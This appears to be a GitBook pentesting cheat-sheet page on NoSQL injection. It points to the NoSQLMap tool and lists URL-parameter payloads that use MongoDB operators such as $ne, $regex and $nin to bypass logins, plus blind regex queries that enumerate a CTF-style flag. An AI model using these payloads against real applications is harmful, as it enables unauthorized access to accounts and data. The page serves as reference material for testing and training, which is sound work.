Pentesting
  • API Pentesting
  • Pivoting techniques
  • Aquatone
  • NOSQL injections
  • Basic LDAP Injection
  • Basic authentication bypass
  • SERVER SIDE REQUEST FORGERY (SSRF)
  • SQL injections
  • SSTI
  • Easy - No Protections
  • GENERAL INFORMATION
  • XML External Entity (XXE) Injection Payloads
  • Post exploitation techniques
  • Hashcat Cheatsheet
  • John The Ripper Cheatsheet
  • Cracking files
  • Wordlists & co.
  • WinRM (Windows Remote Management) Pentesting
  • API windows
  • Command find priv /esc
  • Crawl/Fuzz
  • HTTP Request Smuggling
  • Api keys
  • Pivoting, Tunneling, and Port Forwarding
  • Shells & Payloads
  • API Recon
  • API Token Attacks
Powered by GitBook
On this page
  • Basic NoSQL Injection
  • Get size
  • Enumeration

NOSQL injections

NoSQLMap https://github.com/codingo/NoSQLMap

1-Set options (do this first) 2-NoSQL DB Access Attacks 3-NoSQL Web App attacks 4-Scan for Anonymous MongoDB Access x-Exit

Basic Authentication index.php?login[$regex]=a.*&pass[$ne]=lol index.php?login[$gt]=admin&login[$lt]=test&pass[$ne]=1

Basic NoSQL Injection

http://url?login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto

Blind NoSQL Injection

Get size

index.php ?chall_name=nosqlblind&flag[$regex]=.1

Enumeration

index.php ?chall_name=nosqlblind&flag[$regex]=3a.20

PreviousAquatoneNextBasic LDAP Injection

Last updated 1 year ago

Page cover image